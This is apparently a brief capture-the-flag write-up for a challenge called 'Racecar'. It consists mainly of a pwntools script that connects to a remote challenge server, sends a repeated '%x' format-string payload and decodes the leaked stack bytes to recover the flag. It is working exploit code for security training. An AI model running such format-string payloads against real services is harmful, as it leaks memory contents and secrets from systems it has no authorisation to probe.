41 lines
821 B
Markdown
41 lines
821 B
Markdown
# Racecar
|
|
|
|
* This challenge contains a simple format string exploit. Further instructions can be found in [my pentest repo](https://git.stefan.works/whx/pentest_tools/src/branch/master/Exploits/Binaries/Format%20String.md)
|
|
|
|
```python
|
|
p = remote('178.62.88.151',31280)
|
|
|
|
p.recv()
|
|
p.sendline(b'whackx')
|
|
p.recv()
|
|
p.sendline(b'whackx')
|
|
|
|
print(p.recv())
|
|
p.sendline(b'1')
|
|
print(p.recv())
|
|
p.sendline(b'2')
|
|
print(p.recv())
|
|
p.sendline(b'1')
|
|
print(p.recv())
|
|
p.sendline(b'2')
|
|
|
|
print(p.recv())
|
|
p.sendline(b'%x ' *100)
|
|
print("[+] send payload")
|
|
|
|
l = p.recvall()
|
|
l =l.split(b'm\n')
|
|
l = l[-1].split()
|
|
res = []
|
|
for x in l[::-1]:
|
|
try:
|
|
#print(bytes.fromhex(x.split()[0].decode())[::-1])
|
|
x = bytes.fromhex(x.decode())[::-1]
|
|
res.append(x.decode())
|
|
except:
|
|
pass
|
|
print(''.join(res[::-1]))
|
|
p.close()
|
|
```
|
|
|